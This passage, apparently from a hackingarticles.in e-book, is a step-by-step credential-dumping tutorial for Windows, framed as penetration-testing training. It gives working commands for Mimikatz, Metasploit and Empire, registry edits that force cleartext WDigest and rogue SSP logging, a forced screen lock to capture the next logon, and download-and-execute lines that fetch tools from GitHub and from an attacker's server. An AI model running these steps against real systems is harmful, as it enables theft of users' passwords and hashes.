www.hackingarticles.

in Page | 1
 Table of Contents
Introduction ....................................................... 7
What is Credential Dumping? ...................................... 7
Credential Dumping in Real Life .................................. 7
Credential Dumping: Wireless ....................................... 9
Manual Credential Dumping ........................................ 9
Credential Dumping using netsh .................................. 10
Credential Dumping using WirelessKeyView ........................ 12
Credential Dumping using Wifi Network Properties ................ 13
Credential Dumping using LaZagne ................................ 14
Credential Dumping using Mimikatz ............................... 15
Credential Dumping using Metasploit Framework ................... 16
Credential Dumping: Group Policy Preferences (GPP) ................ 18
What is Group Policy Preferences? ............................... 18
Why using GPP to create a user account is a bad Idea? ........... 18
Create an Account in Domain Controller with GPP ................. 19
Exploiting Group Policy Preferences via Metasploit-I ............ 21
Exploiting Group Policy Preferences via Metasploit -II .......... 22
Gpp-Decrypt ..................................................... 24
GP3finder ....................................................... 26
PowerShell Empire ............................................... 26
Windows Powershell .............................................. 27
Credential Dumping: Windows Credential Manager .................... 29
Accessing Credential Manager .................................... 29
Metasploit ........................................................ 32
Empire .......................................................... 33
CredentialsFileView ............................................. 35
Windows PowerShell .............................................. 36
Credential Dumping: WDigest ....................................... 38
Introduction to Wdigest ......................................... 38
Working of WDigest.dll .......................................... 38

www.hackingarticles.in Page | 2
 Manual .......................................................... 39
PowerShell ...................................................... 42
PowerShell via Meterpreter ...................................... 43
Metasploit Framework ............................................ 45
PowerShell Empire ............................................... 46
CrackMapExec .................................................... 47
Credential Dumping: Security Support Provider (SSP) ............... 49
Introduction to Security Support Provider ....................... 49
Manual .......................................................... 49
Mimikatz ........................................................ 52
Metasploit Framework ............................................ 53
Koadic .......................................................... 55
PowerShell Empire ............................................... 56
Powershell Empire: mimilib.dll .................................. 57
Credential Dumping: SAM ........................................... 60
Introduction to SAM ............................................. 60
How are Passwords stored in Windows? ............................ 60
LM authentication ............................................... 60
NTLM authentication ............................................. 60
Windows 7 ......................................................... 61
PwDump7 ......................................................... 61
SamDump2 ...................................................... 62
Metasploit Framework: Invoke-Powerdump.ps1 .................... 62
Metasploit Framework: Get-PassHashes.ps1 ...................... 63
PowerShell .................................................... 63
Windows 10 ........................................................ 64
Mimikatz ...................................................... 64
Impacket ...................................................... 65
Metasploit Framework: HashDump ................................ 65
Metasploit Framework: credential_collector .................... 66
Metasploit Framework: load kiwi ............................... 66
Koadic ........................................................ 67
Powershell Empire: mimikatz/sam ............................... 68
LaZAgne ....................................................... 69

www.hackingarticles.in Page | 3
 CrackMapExec .................................................. 69
Decrypting Hash: John the Ripper .............................. 70
Credential Dumping: Applications .................................. 72
PowerShell Empire ............................................. 72
CoreFTP: Metasploit Framework ................................. 74
FTP Navigator: LaZagne ........................................ 74
FTPNavigator: Metasploit Framework ............................ 75
FileZilla: Metasploit Framework ............................... 75
HeidiSQL: Metasploit Framework ................................ 76
Email: Mail PassView .......................................... 76
Pidgin: Metasploit Framework .................................. 77
PSI: LaZagne .................................................. 78
PST: PstPassword .............................................. 78
VNC: Metasploit Framework ..................................... 79
WinSCP: LaZagne ............................................... 79
WinSCP: Metasploit Framework .................................. 80
Credential Dumping: NTDS.dit ...................................... 81
Introduction to NTDS .......................................... 82
Extracting Credential by Exploit NTDS.dit in Multiple Methods ... 83
FGDump ........................................................ 83
Powershell: NTDSUtil ............................................ 84
DSInternals ................................................... 85
NTDSDump.exe .................................................. 86
Remote: Metasploit (NTDS_location) ............................ 87
Metasploit (NTDS_grabber) ..................................... 87
Remote: Metasploit (secretsdump) .............................. 88
CrackMapExec .................................................. 89
Hash Cracking ................................................. 89
Credential Dumping: Phishing Windows Credentials .................. 92
Metasploit Framework: phish_windows_credentials ............... 92
FakeLogonScreen ............................................... 93
SharpLocker ................................................... 95
PowerShell Empire: collection/prompt .......................... 96
PowerShell Empire: collection/toasted ......................... 97

www.hackingarticles.in Page | 4
 Koadic ........................................................ 98
PowerShell: Invoke-CredentialsPhish.ps1 ....................... 99
PowerShell: Invoke-LoginPrompt.ps1 ........................... 100
Lockphish .................................................... 101
Credential Dumping: Local Security Authority (LSA|LSASS.EXE) ..... 104
Windows 7 (lsass.exe) Credential Dump using Mimikatz ............. 105
Method 1: Task manager ....................................... 105
Method 2: ProcDump ........................................... 107
Method 3: comsvcs.dll ........................................ 108
Windows 10 (LSA) Credential Dump ................................. 109
Method 1: Task manager ....................................... 109
Method 2: Mimikatz parameter -patch .......................... 112
Method3: Mimikatz – Token Elevation .......................... 113
Method 4: Editing File Permission in the Registry ............ 114
Method 5: Save privilege File of the Registry ................ 116
PowerShell Empire ............................................ 118
Koadic ....................................................... 119
Metasploit ....................................................... 120
Method1: Load kiwi ........................................... 120
Method2: Load powershell ..................................... 121
CrackMapExec ................................................. 122
Credential Dumping: Clipboard .................................... 124
PowerShell Empire ............................................ 125
Meterpreter Framework ........................................ 126
Koadic ....................................................... 127
Credential Dumping: DCSync ....................................... 129
What is DCSYNC Attack ........................................ 129
Mimikatz ..................................................... 129
PowerShell Empire ............................................ 133
Metasploit ................................................... 135
Credential Dumping: LAPS ......................................... 138
Configuration ................................................ 138
Metasploit ................................................... 142
PowerShell Empire ............................................ 143

www.hackingarticles.in Page | 5
Credential Dumping: Domain Cache Credential ...................... 145
Domain Cache credential (DCC2) ............................... 145
Metasploit ................................................... 145
Impacket ..................................................... 146
Mimikatz ..................................................... 147
PowerShell Empire ............................................ 148
Koadic ....................................................... 149
Python Script ................................................ 150
Cracking DCC2 or MACHACHE2/MSCASH2 ........................... 151
Credential Dumping: Fake Services ................................ 153
Introduction ................................................. 153
FTP .......................................................... 153
Telnet ....................................................... 155
VNC .......................................................... 156
SMB .......................................................... 157
http_basic ................................................... 160
POP3 ......................................................... 162
SMTP ......................................................... 163
PostgreSQL ................................................... 164
MsSQL ........................................................ 165
http_ntlm .................................................... 166
MySQL ........................................................ 167
Credential Dumping: Windows Autologon Password ................... 170
Method 1: Nirsoft-Network Password Recovery .................. 171
Method 2: DecryptAutologon.exe ............................... 172
Reference ........................................................ 172
About Us ......................................................... 174

www.hackingarticles.in Page | 6
When the term password cracking is used in the cyber world, it is being used as a broad concept as it
shelters all the methods related to attacking/dumping/retrieving passwords of the victim/target. But
today, in this article we will solely focus on a technique called Credential Dumping.
Credential dumping is said to be a technique through which username and passwords are extracted
from any login account from the target system. It is this technique that allows an attacker to get
credentials of multiple accounts from one person. And these credentials can be of anything such as a
bank, email account, social media account, wireless networks.

When an attacker has access to the target system and through that access, they successfully retrieve
the whole bunch of their credentials. Once you are inside the target’s system, there are multiple
methods to retrieve the credentials of a particular thing. For instance, to redeem all the names and
passwords of the wireless networks to which the operating system has connected, there are various
methods that an attacker can use and we will try and cover all of those methods here in our article.
Now another thing to focus on is that this dumping of credentials can be done both in internal
penetration testing and external penetration testing, it depends on the methodology, perspective or
subjectivity of the attack on the bases of which the best suitable method can be decided.

www.hackingarticles.in Page | 7
All the Wi-Fi password with their respective SSID is stored in an XML file. The location of these files
is C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***. Here, you will find that the SSID of
wifi is saved in clear text whereas passwords are stored as keys.

www.hackingarticles.in Page | 9
Netsh is a scripting utility provided by Microsoft itself. It can be used both in command prompt or
Windows PowerShell. Netsh is short for network shell. When executed, it provides detailed
information about the configuration of the network that the system ever had; including revealing the
credentials of wireless networks that it has ever been connected to. This utility comes with various
parameters that can be used to get various information as per the requirement. This method can be
used both in internal and external penetration testing as netsh commands can be executed both
locally and remotely.
To get the list of the SSIDs that the device has been connected to use the following command:

netsh wlan show profiles

And as a result of the above command, you can see the names of the Wi-Fi networks that the system
was connected to in the past or present such as Meterpreter, Linuxlab, etc. The same has been
demonstrated in the image above.

www.hackingarticles.in Page | 10
Further, to know the passwords of any one of the mentioned SSIDs use the following command:

netsh wlan show profile name=<SSID Name> key=clear

And just like it is shown in the image above, the result of the above command will give you the
password.

www.hackingarticles.in Page | 11
A wireless key view is a simple software that accesses the XML files where wireless passwords are
stored and reveals them in cleartext. This tool was developed to recover lost and forgotten password
of a wireless network. This is the perfect method for credential dumping in internal network
penetration testing. To utilize this method simply download the tool from here and run it, you will get
all the Wi-Fi names and its password as shown in the image below:

www.hackingarticles.in Page | 12
Our next method is manual, it is good when you are introduced to the network to work but for some
reason, the password of the network isn’t revealed to you. Then you can use this method, as it falls
under the category of internal penetration testing methodology. To reveal the password of a wireless
network manually, go to Control Panel > Network and Internet > Network and Sharing Center and
then click on Wi-Fi (*SSID*). A dialogue box will open, in that box click the Wireless Properties button
in the upper pane. Next, go to the Security tab and you can see the password there just as it is shown
in the image below:

www.hackingarticles.in Page | 13
LaZagne is an open-source tool that was developed to retrieve all the passwords stored in your
machine. We have covered LaZagne in our other article, which you can read from here. In our
experience, LaZagne is an amazing tool for credential dumping and it’s the best tool to be used for
external penetration testing. To extract a Wi-Fi password with LaZagne, simply download the tool from
here and run it remotely using it following command:

lazagne.exe wifi

After running the above command, all the Wi-Fi-related passwords with their respective SSID will be
extracted.

www.hackingarticles.in Page | 14
Another method that can be very useful in external penetration testing is using Mimikatz. We have
covered various features of Mimikatz in our other article, which you can find here. Once you have the
victim’s session use the following commands to get the passwords:

getsystem
load kiwi
wifi_list_shared

And very easily you will have all the passwords at your service as shown in the image above.

www.hackingarticles.in Page | 15
Then our next method is to use Metasploit to retrieving desired passwords. As all of us know that
Metasploit is a framework that provides us with already constructed exploits to make pen testing
convenient. And is an amazing platform for a beginner and expert in hacking the pentesting world.
Now, to dump credentials there comes an in-built post exploits in the Metasploit and to run the said
exploit; go to the terminal of Metasploit by typing msfconsole and get the session of you to the target
system using any exploit you prefer. And then background the session use the post-exploit for
extracting desired Wi-Fi credentials by using the following commands:

use post/windows/wlan/wlan_profile
set session 1
exploit

And just as it is shown in the image above, you will have your credentials.

www.hackingarticles.in Page | 16
Group Policy preferences shortly term as GPP permit administrators to configure and install Windows
and application settings that were previously unavailable using Group Policy. One of the most useful
features of Group Policy Preferences (GPP) is the ability to store, and these policies can make all kinds
of configuration changes to machines, like:
 Map Drives
 Create Local Users
 Data Sources
 Printer configuration
 Registry Settings
 Create/Update Services
 Scheduled Tasks
 Change local Administrator passwords

If you use Microsoft GPP to create a local administrator account, consider the safety consequences
carefully. Since the password is stored in SYSVOL in a preferred item. SYSVOL is the domain-extensive
share folder in the Active Directory accessed by all authenticated users.
All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
When a new GPP is created for the user or group account, it’ll be interrelated with a Group.XML file
created in SYSVOL with the relevant configuration information and the password is AES-256 bit
encrypted. Therefore, the password is not secure at all authenticated users have access to SYSVOL.
“In this article, we will be doing active directory penetration testing through Group Policy Preferences
and try to steal store password from inside SYSVOL in multiple ways”.
Let’s Start!!
Lab Setup Requirement:
 Microsoft Windows Server 2008 r2
 Microsoft Windows 7/10
 Kali Linux

www.hackingarticles.in Page | 18
On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain
Controller” using Group Policy Management.

Now create a new user account by navigating to Computer Configuration > Control Panel Settings >
Local Users and Groups.
Then Right-click in the “Local Users and Groups” option and select the New > Local User.

Then you get an interface for new local user property where you can create a new user account.

www.hackingarticles.in Page | 19
As you can observe from the given below image, we had created an account for user “raaz”.

Don’t forget to update the group policy configuration.

www.hackingarticles.in Page | 20
So, as I had already discussed above, that, whenever a new gpp is created for the user or group
account, it will be associated with a Group.XML which is stored inside /SYSVOl.
From the image below, you can see the entire path that leads to the file Group.xml. As you can see,
this XML file holds cpassword for user raaz within the property tags in plain text.

As we know an authorized user can access SYSVOL and suppose I know the client machine credential,
let say raj: Ignite@123 then with help of this I can exploit Group Policy Preference to get the XML file.
The Metasploit auxiliary module lets you enumerate files from target domain controllers by
connecting to SMB as the rouge user.
This module enumerates files from target domain controllers and connects to them via SMB. It then
looks for Group Policy Preference XML files containing local/domain user accounts and passwords and
decrypts them using Microsoft’s public AES key. This module has been tested successfully on a Win2k8
R2 Domain Controller.

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit

www.hackingarticles.in Page | 21
Hence you can observe, that it has dumped the password:abcd@123 from inside the Group.xml file
for user raaz.

Metasploit also provide a post exploit for enumerating the cpassword, but for this, you need to
compromise the target’s machine at least once and then you will be able to run the below post exploit.
This module enumerates the victim machine’s domain controller and connects to it via SMB. It then
looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts
them using Microsoft’s public AES key. Cached Group Policy files may be found on end-user devices if
the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit

www.hackingarticles.in Page | 22
From the given below image you can observe, it has been found cpassword twice from two different
locations:
C:\ProgramData\Microsoft\Group Policy\History\{ EE416E94-7362-4587-9CEC-
651656DB7538}\Machine\Preferences\Groups\Groups.xml
C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{ EE416E94-7362-4587-9CEC-
651656DB7538}\Machine\Preferences\Groups\Groups.xml

www.hackingarticles.in Page | 23
Another method is to connect with the target’s machine via SMB and try to access /SYSVOL with the
help of smbclient. Therefore execute its command to access the shared directory via an authorized
account and then move to the following path to get Group.xml
file:SYSVOL\sysvol\Pentes.Local\Policies\{ EE416E94-7362-4587-9CEC-
651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient //192.168.1.103/SYSVOL -U raj

www.hackingarticles.in Page | 24
As you can observe, we have successfully transfer Group.xml to our local machine. As this file holds
cpassword, so now we need to decrypt it.

For decryption, we use “gpp-decrypt” which is embedded in a simple ruby script in Kali Linux which
decrypts a given GPP encrypted string.
Once you got access to Group.xml file, you can decrypt cpassword with the help of the following
syntax:

gpp-decrypt <encrypted cpassword >

gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80
As a result, it dumps the password in plain text as shown below.

www.hackingarticles.in Page | 25
This is another script written in python for decrypting the cpassword and you can download this tool
from here.
Once you got access to Group.xml file, you can decrypt cpassword with the help of the following
syntax:

gpp-decrypt <encrypted cpassword >

gp3finder.exe -D
qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XS
As a result, it dumps the password in plain text as shown below.

This another framework just like Metasploit where you need to access a low privilege shell. once you
exploit the target machine then use privesc/gpp module to extract the password from inside
Group.xml file.
This module Retrieves the plaintext password and other information for accounts pushed through
Group Policy Preferences.

agents
usemodule privesc/gpp
execute

www.hackingarticles.in Page | 26
As a result, it dumps the password in plain text as shown below.

There is another method to retrieves the plaintext password and other information for accounts
pushed through Group Policy Preferences locally with the help of power split “Get-GPPPaswword”.
You can download the module from here, it is a Powershell script which you need
Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and
datasources.xml and returns plaintext passwords.
Now run the following command in the PowerShell:

Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword

As a result, you can observe that it has dumped the saved password from inside group.xml file.

www.hackingarticles.in Page | 27
To access credential manager, you can simply search it up in the start menu or you can access it bu
two of the following methods:
You can open control panel > user accounts > credential manager
You can also access it through the command line with the command vaultcmd and its parameters.
When you connect to another system in the network using any method like in the following image:

And while connecting when you provide the password and store it for later use too then these
credentials are saved in credential manager.

Irrespective of the website and its security, when you save any password in the edge or any other
application such as skype or outlook, it’s password too gets saved in credential manager. For instance,
we have stored Gmail’s password in our practice as shown in the image below:

www.hackingarticles.in Page | 29
You can confirm from the following image that the password is indeed saved.

www.hackingarticles.in Page | 30
And now, when you access credential manager, using any method, you will find that in the windows
credentials tab all the system, network passwords are stored.

And under the web credentials tab there are will be application’s passwords and the passwords saved
in the edge will be saved.

www.hackingarticles.in Page | 31
Now all these credentials can be dumped with simple methods. Once you have a session through
Metasploit, all you have to do is upload mimikatz and run it. Mimikatz is an amazing credential
dumping tool. We have covered mimikatz in detail in one of our previous articles, to read that article
click here.
And to run mimikatz remotely through Metasploit session, use the following command:

upload /root/Desktop/mmikatz.exe
shell
cd <location of the uploaded file in the target system>
mimikatz.exe

And once the mimikats is executed successfully, you will get credentials from the cred manager as
shown in the image above.

www.hackingarticles.in Page | 32
Similarly, while using empire, you can dump the credentials by downloading Lazagne.exe directly in
the target system and then manipulating the lagazne.exe file to get all the credentials. LaZange is one
of the best credential dumping tools. We have covered LaZagne in detail in one of our previous articles,
to read that article click here.
Use the following commands to dump the credentials with this method:

shell wget
https://github.com/AlessandrZ/LaZagne/releases/download2.4
.3/lazagne.exe -outfile lazagne.exe
shell wget
shell dir
shell ./lazagne.exe all

www.hackingarticles.in Page | 33
After the execution of commands, you can see that the passwords have been retrieved as shown in
the following image:

www.hackingarticles.in Page | 34
Our next method is using a third-party tool, i.e., credential-file view. This tool is very effective when it
comes to internal penetration testing. To use this tool, simply download it and launch it. After
launching itself, it will ask you for the windows password.

Once you provide the password, it will give you all the credentials you need as shown in the image
below:

www.hackingarticles.in Page | 35
This method of password dumping can prove itself useful in both internal and external pentesting. In
this method, you have to run a script in Windows Powershell. You will find the script here. And once
you run the script you will have all the web credentials as shown in the image below:

You can also use PowerShell remotely to dump credentials with the help of Metasploit. It is very simple
as you just have to run a combination of the following commands after you have your session:

load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials

And just like that with the help of PowerShell commands, you will have the desired credentials.

www.hackingarticles.in Page | 36
WDigest.dll was launched through Windows XP was specifically crafted for HTTP and SASL
authentication. Its work was to send confirmation of secret keys to authenticate the said protocol. The
security attributes of the NTLM protocol were applied to this DLL file as it’s a challenge/response
protocol too. WDigest protocol is enabled in Windows XP — Windows 8.0 and Windows Server 2003
— Windows Server 2012 by default, which allows credentials to be saved in clear text in LSAS file.
Windows 10, Windows Server 2012 R2 and Windows Server 2016 doesn’t have this protocol active.
And it also released a patch for earlier versions.

As it is a challenge-response protocol, it important to understand how it works. Such protocols

demand a validating server that creates a challenge for them. The said challenge has incalculable data.
A is key is obtained from the user’s password which is further used to encrypt the challenge and to
craft a response. A reliable service can then validate the user processes by comparing to the encrypted
response that is received by the client and if the responses match, then the user is authenticated.
Now that we have understood what exactly a WDigest protocol is and how it works, let’s get to
practice how to exploit it.

www.hackingarticles.in Page | 38
Our first method to exploit WDigest to dump the desired credentials is manual. Such a method comes
in handy in white box pentesting. In this method, download mimikatz and run the following
commands:

privilege::debug
sekrusla::wdigest

As you can then see that the result of the above commands didn’t bear a fruit because the WDigest
protocol wasn’t active. To activate the said protocol, use the following command:

reg add
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\W
Digest /v UseLogonCredential /t REG_DWORD /d 1

www.hackingarticles.in Page | 39
The above command will create a file called UseLogonCredetnial in the WDigest folder in the registry
and simultaneously sets its binary value to 1 as you can in the image below:

The above step has just enabled WDigest in the system. Which will allow the password to be saved in
memory that too in clear texts. And now these passwords can be retrieved sneakily as you will see
further in this article.

www.hackingarticles.in Page | 40
For now, we need to update the policy that we just entered in the registry using the following
command:

gpupdate
/force

Now, if you launch mimikatz and run the following commands then you will have the credentials.

privilege::debug
sekurlsa::wdigest

www.hackingarticles.in Page | 41
 In this method, we will be invoking PowerShell scripts in the system. This script will further help us get
our hands on the credentials.
Download WdigestDowngrade.ps1
Simply launch the PowerShell Command Prompt and run the following commands:

Import-Module .\WdigestDowngrade.ps1
Invoke-WdigestDowngrade
reg query
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\W

Once the above commands are executed successfully, run the following command to dump the
credentials.

IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerSh
ellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltrati
on/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

And as you can see, we got the credentials.

www.hackingarticles.in Page | 42
 In this method, we will be invoking the PowerShell script in our meterpreter session. This script will
further help us get our hands on the credentials. When you have a meterpreter session, run the
following commands to create the UseLogonCredential file and make changes in the registry key.

reg enumkey -k
HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\
\WDigest
load powershell
powershell_import /root/Desktop/Invoke-WdigestDowngrade.ps1
powershell_execute Invoke-WdigestDowngrade

www.hackingarticles.in Page | 43
After the above commands create the UseLogonCredential file as required and then you can launch
mimikatz to dump the credentials using the following commands:
Download Invoke Mimikatz.ps1

load powershell
powershell_import /root/Invoke-Mimikatz.ps1
powershell_execute Invoke-Mimikatz -CredsDump

www.hackingarticles.in Page | 44
Our next method is an excellent method to dump the credentials remotely which often a requirement
in grey box pentesting. Once you have your meterpreter session via Metasploit, remember to
background the session and then you can execute the wdigest_caching exploit to make the changes
in the WDigest folder which we just did manually in our previous method by using the following
commands:

use post/windows/manage/wdigest_caching
set session 1
execute

Then further use the load kiwi module to dump the credentials. For doing so, type:

load kiwi
creds_wdigest

And yes! We got our credentials.

www.hackingarticles.in Page | 45
When you have a session through Empire, use the post exploit wdigest_downgrade to create
the UseLogonCredential file in wdigest folder and its registry key value i.e., 1 with the help of the
following commands:

usemodule management/wdigest_downgrade*
execute

Once the above post exploit is executed successfully, you can use another build in post exploit to dump
the credentials with the following set of commands:

usemodule credentials/mimikatz/command*
set Command sekurlsa::wdigest
execute

And after the execution of the above command, you have the credentials.

www.hackingarticles.in Page | 46
CrackMapExec is a sleek tool that can be installed with a simple apt install and it runs very swiftly. This
tool creates the registry key due to which passwords are stored in memory as discussed previously. It
requires a bunch of things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105

crackmapexec smb 192.168.1.105 -u 'Administrator'

-p 'Ignite@987' -M wdigest -o ACTION=enable

www.hackingarticles.in Page | 47
Security Support Provider (SSP) is an API used by windows to carry out authentications of windows
login. it’s a DLL file that provides security packages to other applications. This DLL stack itself up in LSA
when the system starts; making it a start-up process. After it is loaded in LSA, it can access all of the
window’s credentials. The configurations of this file are stored in two different registry keys and you
find them in the following locations:

HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security
Packages

The first method that we are going to use to exploit SSP is manual. Once the method is successfully
carried out and the system reboots itself, it will dump the credentials for us. These credentials can be
found in a file that will be created upon user login with the name of kiwissp. This file can find in the
registry inside hklm\system\currentcontrolset\control\lsa.
The first step in this method is to copy the mimilib.dll file from mimikatz folder to the system32 folder.
This file is responsible for creating kiwissp file which stores credentials in plaintext for us.

www.hackingarticles.in Page | 49
 Then navigate yourself to hklm\system\currentcontrolset\control\lsa. And here you can find that
there is no entry in Security Packages as shown in the image below:

The same can be checked with the following PowerShell command:

reg query hklm\system\currentcontrolset\control\lsa\

/v "Security Packages"

Just as shown in the image below, there is no entry. So, this needs to be changed if want to dump the
credentials. We need to add all the services that help SSP to manage credentials; such as Kerberos,
wdigest etc. Therefore, we will use the following command to make these entries:

reg add "hklm\system\currentcontrolset\control\lsa\" /v

"Security Packages" /d
"kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mim
ilib" /t REG_MULTI_SZ /f

www.hackingarticles.in Page | 50
And then to confirm whether the entry has been done or not, use the following command:

reg query hklm\system\currentcontrolset\control\lsa\

/v "Security Packages"

You can then again navigate yourself to hklm\system\currentcontrolset\control\lsa to the entries

that you just made.

www.hackingarticles.in Page | 51
Now, whenever the user reboots their PC, a file with the name of kiwissp.log will be created in
system32. Then this file will have your credentials stored in cleartext. Use the following command to
read the credentials:

type C:\Windows\System32\kiwissp.log

Mimikatz provides us with a module that injects itself in the memory and when the user is signed out
of the windows, then upon signing in the passwords are retrieved from the memory with the help of
this module. For this method, just load mimikatz and type:

privilege::debug
misc::memssp

Running the above commands will create mimilsa.log file in system32 upon logging in by the user. To
read this file use the following command;

www.hackingarticles.in Page | 52
 type C:\Windows\System32\mimilsa.log

When dumping credentials remotely, Metasploit comes in handy. The ability of Metasploit to provide
us with kiwi extension allows us to dump credentials by manipulating SSP just like our previous
method. Now when you have a meterpreter session through Metasploit use the load kiwi command
to initiate kiwi extension. And then to inject the mimikatz module in memory using the following
command:

kiwi_cmd misc::memssp

Now the module has been successfully injected into the memory. As this module creates the file with
clear text credential when the user logs in after the memory injection; we will force the lock screen
on the victim so that after login we can have our credentials. For this run the following commands:

shell
RunDll32.exe user32.dll,LockWorkStation

www.hackingarticles.in Page | 53
Now we have forced the user to logout of the system. Whenever the user will log in our mimilsa file
will be created in the system32 and to read the file using the following command:

type C:\Windows\System32\mimilsa.log

www.hackingarticles.in Page | 54
Just like Metasploit, Koadic too provides us with a similar mimikatz module; so, let’s get to dumping
the credentials.
Once you have a session with Koadic, use the following exploit to inject the payload into the memory:

use mimikatz_dynwrapx
set MIMICMD misc::memssp

Once the above exploit has successfully executed itself, use the following commands to force the user
to sign out of the windows and then run the dll command to read the mimilsa file:

cmdshell 0
RunDll32.exe user32.dll,LockWorkStation
type mimilsa.log

As shown in the above image, you will have your credentials.

www.hackingarticles.in Page | 55
Empire is an outstanding tool, we have covered the PowerShell empire in a series of article, to read
the article click here. With the help of mimikatz, empire allows us to inject the payload into the
memory which further allows us to retrieve windows logon credentials. Once to have a session
through the empire, use the following post exploit to get your hands on the credentials:

usemodule persistence/misc/memssp
execute

After the exploit has executed itself successfully, all that is left to do is lock the user out of their system
so that when they sign in, we can have the file that saves credentials in plaintext for us. And no to lock
the user out of their system use the following exploit:

usemodule management/lock
execute

www.hackingarticles.in Page | 56
After the user logs in, the said file will be created. To read the contents of the file use the following
command:

type C:\Windows\System32\mimilsa.log

In the manual method, everything that w did can also be done remotely through empire which is
useful in external penetration testing. The first step in this method is to send the mimilib.dll file from
mimikatz folder to the system32 folder in the target system. To do so, simply go to the mimikatz folder
where the mimilib.dll file is located and initiate the python server as shown in the following image:

python -m SimpleHTTPServer

www.hackingarticles.in Page | 57
 After that, through your session, run the following set shell commands to do the deed:

shell wget http://192.168.1.112:8000/mimilib.dll -outfile

mimilib.dll
shell reg query hklm\system\currentcontrolset\control\lsa\
/v "Security Packages"
shell reg add "hklm\system\currentcontrolset\control\lsa\"
/v "Security Packages" /d
"kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib
" /t REG_MULTI_SZ /f

From the above set of commands, the first command will download mimilib.dll from your previously
made python server into the target PC and the rest of the two commands will edit the registry key
value for you. As the commands have executed successfully, all now you have to do is wait for the
target system to restart. And once that happens your file will be created. To access the file, use the
following command:

shell type kiwissp.log

And we have our credentials. Yay!

www.hackingarticles.in Page | 58
SAM is short for the Security Account Manager which manages all the user accounts and their
passwords. It acts as a database. All the passwords are hashed and then stored SAM. It is the
responsibility of LSA (Local Security Authority) to verify user login by matching the passwords with the
database maintained in SAM. SAM starts running in the background as soon as the Windows boots
up. SAM is found in C:\Windows\System32\config and passwords that are hashed and saved in SAM
can found in the registry, just open the Registry Editor and navigate yourself
to HKEY_LOCAL_MACHINE\SAM.

To know how passwords are saved in windows, we will first need to understand what are LM, NTLM
v1 & v2, Kerberos.

LAN Manager (LM) authentication was developed by IBM for Microsoft’s Windows Operating Systems.
The security it provides is considered hackable today. It converts your password into a hash by
breaking it into two chunks of seven characters each. And then further encrypting each chunk. It is not
case sensitive either, which is a huge drawback. This method coverts the whole password string in
uppercase, so when the attacker is applying any attack like brute force or dictionary; they can
altogether avoid the possibility of lowercase. The key it is using to encrypt is 56-bit DES which now can
be easily cracked.

NTLM authentication was developed to secure the systems as LM proved to be insecure at the time.
NTLM’s base is a challenge-response mechanism. It uses three components – nonce (challenge),
response and authentication.
When any password is stored in Windows, NTLM starts working by encrypting the password and
storing the hash of the said password while it disposes of the actual password. And it further sends
the username to the server, then the server creates a 16-byte random numeric string, namely nonce
and sends it to the client. Now, the client will encrypt the nonce using the hash string of the password
and send the result back to the server. This process is called a response. These three components
(nonce, username, and response) will be sent to Domain Controller. The Domain Controller will
recover the password using hash from the Security Account Manager (SAM) database. Furthermore,
the domain controller will check the nonce and response in case they match, Authentication turns out
to be successful.
Working of NTLM v1 and NTML v2 is the same, although there are few differences such as NTML v1 is
MD4 and v2 is MD5 and in v1 C/R Length is 56 bits + 56-bit +16 bit while v2 uses 128 bits. When it
comes to the C/R Algorithm v1 uses DES (ECB mode) and v2 is HMAC_MD5. and lastly, in v1 C/R Value
Length 64 bit + 64 bit + 64 bit and v2 uses 128 bits.
Now as we have understood these hashing systems, let’s focus on how to dump them. The methods
we will focus on are best suited for both internal and external pen-testing. Let’s begin!

www.hackingarticles.in Page | 60
NOTE: Microsoft changed the algorithm on Windows 10 v1607
which replaced the RC4 cipher with AES. This change made
all the extraction tools that directly access SAM to dump
hashes obsolete. Some of the tools have been updated and
handle the new encryption method properly. But others were
not able to keep up.

This tool is developed by Tarasco and you can download it from here. This tool extracts the SAM file
from the system and dumps its credentials. To execute this tool just run the following command in the
command prompt after downloading:

PwDump7.exe

And as a result, it will dump all the hashes stored in the SAM file as shown in the image above.
Now, we will save the registry values of the SAM file and system file in a file in the system by using the
following commands:

reg save hklm\sam c:\sam

reg save hklm\system
c:\system

We saved the values with the above command to retrieve the data from the SAM file.

www.hackingarticles.in Page | 61
Once you have retrieved the data from SAM, you can use the SamDump2 tool to dump its hashes with
the following command:

samdump2 system sam

Download Invoke-Powerdump Script

The method of Metasploit involves PowerShell. After getting the meterpreter session, access windows
PowerShell by using the command load PowerShell. And then use the following set of commands to
run the Invoke-PowerDump.ps1 script.

powershell_import /root/powershell/Invoke-PowerDump.ps1
powershell_execute Invoke-PowerDump

Once the above commands execute the script, you will have the dumped passwords just as in the
image above.

www.hackingarticles.in Page | 62
Download Get-PassHashes Script
Again, via meterpreter, access the windows PowerShell using the command load PowerShell. And just
like in the previous method, use the following commands to execute the scripts to retrieve the
passwords.

powershell_import /root/powershell/Get-PassHashes.ps1
powershell_execute Get-PassHashes

